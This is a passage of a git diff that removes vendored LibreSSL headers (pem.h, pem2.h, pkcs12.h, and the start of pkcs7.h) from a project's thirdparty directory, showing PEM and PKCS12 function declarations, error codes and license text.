-int	PEM_def_callback(char *buf, int num, int w, void *key);
-void	PEM_proc_type(char *buf, int type);
-void	PEM_dek_info(char *buf, const char *type, int len, char *str);
-
-
-DECLARE_PEM_rw(X509, X509)
-
-DECLARE_PEM_rw(X509_AUX, X509)
-
-DECLARE_PEM_rw(X509_CERT_PAIR, X509_CERT_PAIR)
-
-DECLARE_PEM_rw(X509_REQ, X509_REQ)
-DECLARE_PEM_write(X509_REQ_NEW, X509_REQ)
-
-DECLARE_PEM_rw(X509_CRL, X509_CRL)
-
-DECLARE_PEM_rw(PKCS7, PKCS7)
-
-DECLARE_PEM_rw(NETSCAPE_CERT_SEQUENCE, NETSCAPE_CERT_SEQUENCE)
-
-DECLARE_PEM_rw(PKCS8, X509_SIG)
-
-DECLARE_PEM_rw(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO)
-
-#ifndef OPENSSL_NO_RSA
-
-DECLARE_PEM_rw_cb(RSAPrivateKey, RSA)
-
-DECLARE_PEM_rw_const(RSAPublicKey, RSA)
-DECLARE_PEM_rw(RSA_PUBKEY, RSA)
-
-#endif
-
-#ifndef OPENSSL_NO_DSA
-
-DECLARE_PEM_rw_cb(DSAPrivateKey, DSA)
-
-DECLARE_PEM_rw(DSA_PUBKEY, DSA)
-
-DECLARE_PEM_rw_const(DSAparams, DSA)
-
-#endif
-
-#ifndef OPENSSL_NO_EC
-DECLARE_PEM_rw_const(ECPKParameters, EC_GROUP)
-DECLARE_PEM_rw_cb(ECPrivateKey, EC_KEY)
-DECLARE_PEM_rw(EC_PUBKEY, EC_KEY)
-#endif
-
-#ifndef OPENSSL_NO_DH
-
-DECLARE_PEM_rw_const(DHparams, DH)
-
-#endif
-
-DECLARE_PEM_rw_cb(PrivateKey, EVP_PKEY)
-
-DECLARE_PEM_rw(PUBKEY, EVP_PKEY)
-
-int PEM_write_bio_PKCS8PrivateKey_nid(BIO *bp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int PEM_write_bio_PKCS8PrivateKey(BIO *, EVP_PKEY *, const EVP_CIPHER *,
-    char *, int, pem_password_cb *, void *);
-int i2d_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int i2d_PKCS8PrivateKey_nid_bio(BIO *bp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-EVP_PKEY *d2i_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY **x, pem_password_cb *cb,
-    void *u);
-
-int i2d_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int i2d_PKCS8PrivateKey_nid_fp(FILE *fp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int PEM_write_PKCS8PrivateKey_nid(FILE *fp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-
-EVP_PKEY *d2i_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY **x, pem_password_cb *cb,
-    void *u);
-
-int PEM_write_PKCS8PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
-    char *kstr, int klen, pem_password_cb *cd, void *u);
-
-EVP_PKEY *PEM_read_bio_Parameters(BIO *bp, EVP_PKEY **x);
-int PEM_write_bio_Parameters(BIO *bp, EVP_PKEY *x);
-
-
-EVP_PKEY *b2i_PrivateKey(const unsigned char **in, long length);
-EVP_PKEY *b2i_PublicKey(const unsigned char **in, long length);
-EVP_PKEY *b2i_PrivateKey_bio(BIO *in);
-EVP_PKEY *b2i_PublicKey_bio(BIO *in);
-int i2b_PrivateKey_bio(BIO *out, EVP_PKEY *pk);
-int i2b_PublicKey_bio(BIO *out, EVP_PKEY *pk);
-#ifndef OPENSSL_NO_RC4
-EVP_PKEY *b2i_PVK_bio(BIO *in, pem_password_cb *cb, void *u);
-int i2b_PVK_bio(BIO *out, EVP_PKEY *pk, int enclevel, pem_password_cb *cb,
-    void *u);
-#endif
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_PEM_strings(void);
-
-/* Error codes for the PEM functions. */
-
-/* Function codes. */
-#define PEM_F_B2I_DSS					 127
-#define PEM_F_B2I_PVK_BIO				 128
-#define PEM_F_B2I_RSA					 129
-#define PEM_F_CHECK_BITLEN_DSA				 130
-#define PEM_F_CHECK_BITLEN_RSA				 131
-#define PEM_F_D2I_PKCS8PRIVATEKEY_BIO			 120
-#define PEM_F_D2I_PKCS8PRIVATEKEY_FP			 121
-#define PEM_F_DO_B2I					 132
-#define PEM_F_DO_B2I_BIO				 133
-#define PEM_F_DO_BLOB_HEADER				 134
-#define PEM_F_DO_PK8PKEY				 126
-#define PEM_F_DO_PK8PKEY_FP				 125
-#define PEM_F_DO_PVK_BODY				 135
-#define PEM_F_DO_PVK_HEADER				 136
-#define PEM_F_I2B_PVK					 137
-#define PEM_F_I2B_PVK_BIO				 138
-#define PEM_F_LOAD_IV					 101
-#define PEM_F_PEM_ASN1_READ				 102
-#define PEM_F_PEM_ASN1_READ_BIO				 103
-#define PEM_F_PEM_ASN1_WRITE				 104
-#define PEM_F_PEM_ASN1_WRITE_BIO			 105
-#define PEM_F_PEM_DEF_CALLBACK				 100
-#define PEM_F_PEM_DO_HEADER				 106
-#define PEM_F_PEM_F_PEM_WRITE_PKCS8PRIVATEKEY		 118
-#define PEM_F_PEM_GET_EVP_CIPHER_INFO			 107
-#define PEM_F_PEM_PK8PKEY				 119
-#define PEM_F_PEM_READ					 108
-#define PEM_F_PEM_READ_BIO				 109
-#define PEM_F_PEM_READ_BIO_PARAMETERS			 140
-#define PEM_F_PEM_READ_BIO_PRIVATEKEY			 123
-#define PEM_F_PEM_READ_PRIVATEKEY			 124
-#define PEM_F_PEM_SEALFINAL				 110
-#define PEM_F_PEM_SEALINIT				 111
-#define PEM_F_PEM_SIGNFINAL				 112
-#define PEM_F_PEM_WRITE					 113
-#define PEM_F_PEM_WRITE_BIO				 114
-#define PEM_F_PEM_WRITE_PRIVATEKEY			 139
-#define PEM_F_PEM_X509_INFO_READ			 115
-#define PEM_F_PEM_X509_INFO_READ_BIO			 116
-#define PEM_F_PEM_X509_INFO_WRITE_BIO			 117
-
-/* Reason codes. */
-#define PEM_R_BAD_BASE64_DECODE				 100
-#define PEM_R_BAD_DECRYPT				 101
-#define PEM_R_BAD_END_LINE				 102
-#define PEM_R_BAD_IV_CHARS				 103
-#define PEM_R_BAD_MAGIC_NUMBER				 116
-#define PEM_R_BAD_PASSWORD_READ				 104
-#define PEM_R_BAD_VERSION_NUMBER			 117
-#define PEM_R_BIO_WRITE_FAILURE				 118
-#define PEM_R_CIPHER_IS_NULL				 127
-#define PEM_R_ERROR_CONVERTING_PRIVATE_KEY		 115
-#define PEM_R_EXPECTING_PRIVATE_KEY_BLOB		 119
-#define PEM_R_EXPECTING_PUBLIC_KEY_BLOB			 120
-#define PEM_R_INCONSISTENT_HEADER			 121
-#define PEM_R_KEYBLOB_HEADER_PARSE_ERROR		 122
-#define PEM_R_KEYBLOB_TOO_SHORT				 123
-#define PEM_R_NOT_DEK_INFO				 105
-#define PEM_R_NOT_ENCRYPTED				 106
-#define PEM_R_NOT_PROC_TYPE				 107
-#define PEM_R_NO_START_LINE				 108
-#define PEM_R_PROBLEMS_GETTING_PASSWORD			 109
-#define PEM_R_PUBLIC_KEY_NO_RSA				 110
-#define PEM_R_PVK_DATA_TOO_SHORT			 124
-#define PEM_R_PVK_TOO_SHORT				 125
-#define PEM_R_READ_KEY					 111
-#define PEM_R_SHORT_HEADER				 112
-#define PEM_R_UNSUPPORTED_CIPHER			 113
-#define PEM_R_UNSUPPORTED_ENCRYPTION			 114
-#define PEM_R_UNSUPPORTED_KEY_COMPONENTS		 126
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/pem2.h b/thirdparty/libressl/include/openssl/pem2.h
deleted file mode 100644
index 19525b4..0000000
--- a/thirdparty/libressl/include/openssl/pem2.h
+++ /dev/null
@@ -1,71 +0,0 @@
-/* $OpenBSD: pem2.h,v 1.5 2014/06/12 15:49:30 deraadt Exp $ */
-/* ====================================================================
- * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-/*
- * This header only exists to break a circular dependency between pem and err
- * Ben 30 Jan 1999.
- */
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#ifndef HEADER_PEM_H
-void ERR_load_PEM_strings(void);
-#endif
-
-#ifdef __cplusplus
-}
-#endif
diff --git a/thirdparty/libressl/include/openssl/pkcs12.h b/thirdparty/libressl/include/openssl/pkcs12.h
deleted file mode 100644
index e30f9ac..0000000
--- a/thirdparty/libressl/include/openssl/pkcs12.h
+++ /dev/null
@@ -1,350 +0,0 @@
-/* $OpenBSD: pkcs12.h,v 1.17 2016/12/30 15:08:58 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project 1999.
- */
-/* ====================================================================
- * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_PKCS12_H
-#define HEADER_PKCS12_H
-
-#include <openssl/bio.h>
-#include <openssl/x509.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#define PKCS12_KEY_ID	1
-#define PKCS12_IV_ID	2
-#define PKCS12_MAC_ID	3
-
-/* Default iteration count */
-#ifndef PKCS12_DEFAULT_ITER
-#define PKCS12_DEFAULT_ITER	PKCS5_DEFAULT_ITER
-#endif
-
-#define PKCS12_MAC_KEY_LENGTH 20
-
-#define PKCS12_SALT_LEN	8
-
-/* Uncomment out next line for unicode password and names, otherwise ASCII */
-
-/*#define PBE_UNICODE*/
-
-#ifdef PBE_UNICODE
-#define PKCS12_key_gen PKCS12_key_gen_uni
-#define PKCS12_add_friendlyname PKCS12_add_friendlyname_uni
-#else
-#define PKCS12_key_gen PKCS12_key_gen_asc
-#define PKCS12_add_friendlyname PKCS12_add_friendlyname_asc
-#endif
-
-/* MS key usage constants */
-
-#define KEY_EX	0x10
-#define KEY_SIG 0x80
-
-typedef struct {
-	X509_SIG *dinfo;
-	ASN1_OCTET_STRING *salt;
-	ASN1_INTEGER *iter;	/* defaults to 1 */
-} PKCS12_MAC_DATA;
-
-typedef struct {
-	ASN1_INTEGER *version;
-	PKCS12_MAC_DATA *mac;
-	PKCS7 *authsafes;
-} PKCS12;
-
-typedef struct {
-	ASN1_OBJECT *type;
-	union {
-	struct pkcs12_bag_st *bag; /* secret, crl and certbag */
-	struct pkcs8_priv_key_info_st	*keybag; /* keybag */
-	X509_SIG *shkeybag; /* shrouded key bag */
-		STACK_OF(PKCS12_SAFEBAG) *safes;
-		ASN1_TYPE *other;
-	} value;
-	STACK_OF(X509_ATTRIBUTE) *attrib;
-} PKCS12_SAFEBAG;
-
-DECLARE_STACK_OF(PKCS12_SAFEBAG)
-DECLARE_PKCS12_STACK_OF(PKCS12_SAFEBAG)
-
-typedef struct pkcs12_bag_st {
-	ASN1_OBJECT *type;
-	union {
-		ASN1_OCTET_STRING *x509cert;
-		ASN1_OCTET_STRING *x509crl;
-		ASN1_OCTET_STRING *octet;
-		ASN1_IA5STRING *sdsicert;
-		ASN1_TYPE *other; /* Secret or other bag */
-	} value;
-} PKCS12_BAGS;
-
-#define PKCS12_ERROR	0
-#define PKCS12_OK	1
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Compatibility macros */
-
-#define M_PKCS12_x5092certbag PKCS12_x5092certbag
-#define M_PKCS12_x509crl2certbag PKCS12_x509crl2certbag
-
-#define M_PKCS12_certbag2x509 PKCS12_certbag2x509
-#define M_PKCS12_certbag2x509crl PKCS12_certbag2x509crl
-
-#define M_PKCS12_unpack_p7data PKCS12_unpack_p7data
-#define M_PKCS12_pack_authsafes PKCS12_pack_authsafes
-#define M_PKCS12_unpack_authsafes PKCS12_unpack_authsafes
-#define M_PKCS12_unpack_p7encdata PKCS12_unpack_p7encdata
-
-#define M_PKCS12_decrypt_skey PKCS12_decrypt_skey
-#define M_PKCS8_decrypt PKCS8_decrypt
-
-#define M_PKCS12_bag_type(bg) OBJ_obj2nid((bg)->type)
-#define M_PKCS12_cert_bag_type(bg) OBJ_obj2nid((bg)->value.bag->type)
-#define M_PKCS12_crl_bag_type M_PKCS12_cert_bag_type
-
-#endif /* !LIBRESSL_INTERNAL */
-
-#define PKCS12_get_attr(bag, attr_nid) \
-			 PKCS12_get_attr_gen(bag->attrib, attr_nid)
-
-#define PKCS8_get_attr(p8, attr_nid) \
-		PKCS12_get_attr_gen(p8->attributes, attr_nid)
-
-#define PKCS12_mac_present(p12) ((p12)->mac ? 1 : 0)
-
-
-PKCS12_SAFEBAG *PKCS12_x5092certbag(X509 *x509);
-PKCS12_SAFEBAG *PKCS12_x509crl2certbag(X509_CRL *crl);
-X509 *PKCS12_certbag2x509(PKCS12_SAFEBAG *bag);
-X509_CRL *PKCS12_certbag2x509crl(PKCS12_SAFEBAG *bag);
-
-PKCS12_SAFEBAG *PKCS12_item_pack_safebag(void *obj, const ASN1_ITEM *it,
-    int nid1, int nid2);
-PKCS12_SAFEBAG *PKCS12_MAKE_KEYBAG(PKCS8_PRIV_KEY_INFO *p8);
-PKCS8_PRIV_KEY_INFO *PKCS8_decrypt(X509_SIG *p8, const char *pass, int passlen);
-PKCS8_PRIV_KEY_INFO *PKCS12_decrypt_skey(PKCS12_SAFEBAG *bag, const char *pass,
-    int passlen);
-X509_SIG *PKCS8_encrypt(int pbe_nid, const EVP_CIPHER *cipher,
-    const char *pass, int passlen, unsigned char *salt, int saltlen, int iter,
-    PKCS8_PRIV_KEY_INFO *p8);
-PKCS12_SAFEBAG *PKCS12_MAKE_SHKEYBAG(int pbe_nid, const char *pass,
-    int passlen, unsigned char *salt, int saltlen, int iter,
-    PKCS8_PRIV_KEY_INFO *p8);
-PKCS7 *PKCS12_pack_p7data(STACK_OF(PKCS12_SAFEBAG) *sk);
-STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7data(PKCS7 *p7);
-PKCS7 *PKCS12_pack_p7encdata(int pbe_nid, const char *pass, int passlen,
-    unsigned char *salt, int saltlen, int iter, STACK_OF(PKCS12_SAFEBAG) *bags);
-STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7encdata(PKCS7 *p7, const char *pass,
-    int passlen);
-
-int PKCS12_pack_authsafes(PKCS12 *p12, STACK_OF(PKCS7) *safes);
-STACK_OF(PKCS7) *PKCS12_unpack_authsafes(PKCS12 *p12);
-
-int PKCS12_add_localkeyid(PKCS12_SAFEBAG *bag, unsigned char *name,
-    int namelen);
-int PKCS12_add_friendlyname_asc(PKCS12_SAFEBAG *bag, const char *name,
-    int namelen);
-int PKCS12_add_CSPName_asc(PKCS12_SAFEBAG *bag, const char *name,
-    int namelen);
-int PKCS12_add_friendlyname_uni(PKCS12_SAFEBAG *bag, const unsigned char *name,
-    int namelen);
-int PKCS8_add_keyusage(PKCS8_PRIV_KEY_INFO *p8, int usage);
-ASN1_TYPE *PKCS12_get_attr_gen(STACK_OF(X509_ATTRIBUTE) *attrs, int attr_nid);
-char *PKCS12_get_friendlyname(PKCS12_SAFEBAG *bag);
-unsigned char *PKCS12_pbe_crypt(X509_ALGOR *algor, const char *pass,
-    int passlen, unsigned char *in, int inlen, unsigned char **data,
-    int *datalen, int en_de);
-void * PKCS12_item_decrypt_d2i(X509_ALGOR *algor, const ASN1_ITEM *it,
-    const char *pass, int passlen, ASN1_OCTET_STRING *oct, int zbuf);
-ASN1_OCTET_STRING *PKCS12_item_i2d_encrypt(X509_ALGOR *algor,
-    const ASN1_ITEM *it, const char *pass, int passlen, void *obj, int zbuf);
-PKCS12 *PKCS12_init(int mode);
-int PKCS12_key_gen_asc(const char *pass, int passlen, unsigned char *salt,
-    int saltlen, int id, int iter, int n, unsigned char *out,
-    const EVP_MD *md_type);
-int PKCS12_key_gen_uni(unsigned char *pass, int passlen, unsigned char *salt,
-    int saltlen, int id, int iter, int n, unsigned char *out,
-    const EVP_MD *md_type);
-int PKCS12_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md_type,
-    int en_de);
-int PKCS12_gen_mac(PKCS12 *p12, const char *pass, int passlen,
-    unsigned char *mac, unsigned int *maclen);
-int PKCS12_verify_mac(PKCS12 *p12, const char *pass, int passlen);
-int PKCS12_set_mac(PKCS12 *p12, const char *pass, int passlen,
-    unsigned char *salt, int saltlen, int iter,
-    const EVP_MD *md_type);
-int PKCS12_setup_mac(PKCS12 *p12, int iter, unsigned char *salt,
-    int saltlen, const EVP_MD *md_type);
-unsigned char *OPENSSL_asc2uni(const char *asc, int asclen,
-    unsigned char **uni, int *unilen);
-char *OPENSSL_uni2asc(unsigned char *uni, int unilen);
-
-PKCS12 *PKCS12_new(void);
-void PKCS12_free(PKCS12 *a);
-PKCS12 *d2i_PKCS12(PKCS12 **a, const unsigned char **in, long len);
-int i2d_PKCS12(PKCS12 *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_it;
-PKCS12_MAC_DATA *PKCS12_MAC_DATA_new(void);
-void PKCS12_MAC_DATA_free(PKCS12_MAC_DATA *a);
-PKCS12_MAC_DATA *d2i_PKCS12_MAC_DATA(PKCS12_MAC_DATA **a, const unsigned char **in, long len);
-int i2d_PKCS12_MAC_DATA(PKCS12_MAC_DATA *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_MAC_DATA_it;
-PKCS12_SAFEBAG *PKCS12_SAFEBAG_new(void);
-void PKCS12_SAFEBAG_free(PKCS12_SAFEBAG *a);
-PKCS12_SAFEBAG *d2i_PKCS12_SAFEBAG(PKCS12_SAFEBAG **a, const unsigned char **in, long len);
-int i2d_PKCS12_SAFEBAG(PKCS12_SAFEBAG *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_SAFEBAG_it;
-PKCS12_BAGS *PKCS12_BAGS_new(void);
-void PKCS12_BAGS_free(PKCS12_BAGS *a);
-PKCS12_BAGS *d2i_PKCS12_BAGS(PKCS12_BAGS **a, const unsigned char **in, long len);
-int i2d_PKCS12_BAGS(PKCS12_BAGS *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_BAGS_it;
-
-extern const ASN1_ITEM PKCS12_SAFEBAGS_it;
-extern const ASN1_ITEM PKCS12_AUTHSAFES_it;
-
-void PKCS12_PBE_add(void);
-int PKCS12_parse(PKCS12 *p12, const char *pass, EVP_PKEY **pkey, X509 **cert,
-    STACK_OF(X509) **ca);
-PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert,
-    STACK_OF(X509) *ca, int nid_key, int nid_cert, int iter,
-    int mac_iter, int keytype);
-
-PKCS12_SAFEBAG *PKCS12_add_cert(STACK_OF(PKCS12_SAFEBAG) **pbags, X509 *cert);
-PKCS12_SAFEBAG *PKCS12_add_key(STACK_OF(PKCS12_SAFEBAG) **pbags, EVP_PKEY *key,
-    int key_usage, int iter, int key_nid, char *pass);
-int PKCS12_add_safe(STACK_OF(PKCS7) **psafes, STACK_OF(PKCS12_SAFEBAG) *bags,
-    int safe_nid, int iter, char *pass);
-PKCS12 *PKCS12_add_safes(STACK_OF(PKCS7) *safes, int p7_nid);
-
-int i2d_PKCS12_bio(BIO *bp, PKCS12 *p12);
-int i2d_PKCS12_fp(FILE *fp, PKCS12 *p12);
-PKCS12 *d2i_PKCS12_bio(BIO *bp, PKCS12 **p12);
-PKCS12 *d2i_PKCS12_fp(FILE *fp, PKCS12 **p12);
-int PKCS12_newpass(PKCS12 *p12, char *oldpass, char *newpass);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_PKCS12_strings(void);
-
-/* Error codes for the PKCS12 functions. */
-
-/* Function codes. */
-#define PKCS12_F_PARSE_BAG				 129
-#define PKCS12_F_PARSE_BAGS				 103
-#define PKCS12_F_PKCS12_ADD_FRIENDLYNAME		 100
-#define PKCS12_F_PKCS12_ADD_FRIENDLYNAME_ASC		 127
-#define PKCS12_F_PKCS12_ADD_FRIENDLYNAME_UNI		 102
-#define PKCS12_F_PKCS12_ADD_LOCALKEYID			 104
-#define PKCS12_F_PKCS12_CREATE				 105
-#define PKCS12_F_PKCS12_GEN_MAC				 107
-#define PKCS12_F_PKCS12_INIT				 109
-#define PKCS12_F_PKCS12_ITEM_DECRYPT_D2I		 106
-#define PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT		 108
-#define PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG		 117
-#define PKCS12_F_PKCS12_KEY_GEN_ASC			 110
-#define PKCS12_F_PKCS12_KEY_GEN_UNI			 111
-#define PKCS12_F_PKCS12_MAKE_KEYBAG			 112
-#define PKCS12_F_PKCS12_MAKE_SHKEYBAG			 113
-#define PKCS12_F_PKCS12_NEWPASS				 128
-#define PKCS12_F_PKCS12_PACK_P7DATA			 114
-#define PKCS12_F_PKCS12_PACK_P7ENCDATA			 115
-#define PKCS12_F_PKCS12_PARSE				 118
-#define PKCS12_F_PKCS12_PBE_CRYPT			 119
-#define PKCS12_F_PKCS12_PBE_KEYIVGEN			 120
-#define PKCS12_F_PKCS12_SETUP_MAC			 122
-#define PKCS12_F_PKCS12_SET_MAC				 123
-#define PKCS12_F_PKCS12_UNPACK_AUTHSAFES		 130
-#define PKCS12_F_PKCS12_UNPACK_P7DATA			 131
-#define PKCS12_F_PKCS12_VERIFY_MAC			 126
-#define PKCS12_F_PKCS8_ADD_KEYUSAGE			 124
-#define PKCS12_F_PKCS8_ENCRYPT				 125
-
-/* Reason codes. */
-#define PKCS12_R_CANT_PACK_STRUCTURE			 100
-#define PKCS12_R_CONTENT_TYPE_NOT_DATA			 121
-#define PKCS12_R_DECODE_ERROR				 101
-#define PKCS12_R_ENCODE_ERROR				 102
-#define PKCS12_R_ENCRYPT_ERROR				 103
-#define PKCS12_R_ERROR_SETTING_ENCRYPTED_DATA_TYPE	 120
-#define PKCS12_R_INVALID_NULL_ARGUMENT			 104
-#define PKCS12_R_INVALID_NULL_PKCS12_POINTER		 105
-#define PKCS12_R_IV_GEN_ERROR				 106
-#define PKCS12_R_KEY_GEN_ERROR				 107
-#define PKCS12_R_MAC_ABSENT				 108
-#define PKCS12_R_MAC_GENERATION_ERROR			 109
-#define PKCS12_R_MAC_SETUP_ERROR			 110
-#define PKCS12_R_MAC_STRING_SET_ERROR			 111
-#define PKCS12_R_MAC_VERIFY_ERROR			 112
-#define PKCS12_R_MAC_VERIFY_FAILURE			 113
-#define PKCS12_R_PARSE_ERROR				 114
-#define PKCS12_R_PKCS12_ALGOR_CIPHERINIT_ERROR		 115
-#define PKCS12_R_PKCS12_CIPHERFINAL_ERROR		 116
-#define PKCS12_R_PKCS12_PBE_CRYPT_ERROR			 117
-#define PKCS12_R_UNKNOWN_DIGEST_ALGORITHM		 118
-#define PKCS12_R_UNSUPPORTED_PKCS12_MODE		 119
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/pkcs7.h b/thirdparty/libressl/include/openssl/pkcs7.h
deleted file mode 100644
index cff7c96..0000000
--- a/thirdparty/libressl/include/openssl/pkcs7.h
+++ /dev/null
@@ -1,529 +0,0 @@
-/* $OpenBSD: pkcs7.h,v 1.18 2016/12/27 16:12:47 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
